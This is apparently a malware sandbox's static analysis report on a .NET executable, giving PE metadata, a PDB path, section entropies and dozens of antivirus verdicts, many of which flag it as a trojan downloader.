Static | ZeroBOX

PE Compile Time

2049-12-24 15:01:09

PDB Path

C:\Users\Lenovo\Desktop\代码 (2)\代码 (2)\Nopowershell-main (2)\Nopowershell-main\Csharp\NoPower\obj\Debug\jianli.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x0000227c    0x00002400        5.32900506028
.rsrc   0x00006000       0x00005ac8    0x00005c00        4.81299528797
.reloc  0x0000c000       0x0000000c    0x00000200        0.0776331623432

Resources

Name           Offset      Size        Language      Sub-language     File type
RT_ICON        0x00006100  0x00005488  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_GROUP_ICON  0x0000b598  0x00000014  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_VERSION     0x0000b5bc  0x0000030c  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST    0x0000b8d8  0x000001ea  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
DrWeb Clean
MicroWorld-eScan Trojan.GenericKD.66383371
ClamAV Clean
FireEye Generic.mg.7a18c24858f521f7
CAT-QuickHeal Clean
McAfee Artemis!7A18C24858F5
Cylance unsafe
VIPRE Trojan.GenericKD.66383371
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (W)
BitDefender Trojan.GenericKD.66383371
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Gen:NN.ZemsilF.36132.cm0@a4CdsHl
VirIT Clean
Cyren Clean
Symantec Trojan.Gen.MBT
tehtris Clean
ESET-NOD32 MSIL/TrojanDownloader.Agent.PBP
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.MSIL.Crypt.gen
Alibaba Trojan:MSIL/Generic.68de031e
NANO-Antivirus Clean
ViRobot Clean
Rising Downloader.Agent!8.B23 (CLOUD)
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.nm
Trapmine Clean
CMC Clean
Emsisoft Trojan.GenericKD.66383371 (B)
SentinelOne Clean
GData Trojan.GenericKD.66383371
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Trojan/Win32.SGeneric
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Clean
Arcabit Trojan.Generic.D3F4EE0B
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Crypt.gen
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis suspicious
VBA32 Clean
ALYac Trojan.GenericKD.66383371
MAX malware (ai score=86)
DeepInstinct MALICIOUS
Malwarebytes Trojan.PCrypt.MSIL.Generic
Panda Clean
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R03BH0DDE23
Tencent Msil.Trojan-Downloader.Ader.Rgil
Yandex Clean
Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet PossibleThreat
AVG FileRepMalware [Misc]
Avast FileRepMalware [Misc]
No IRMA results available.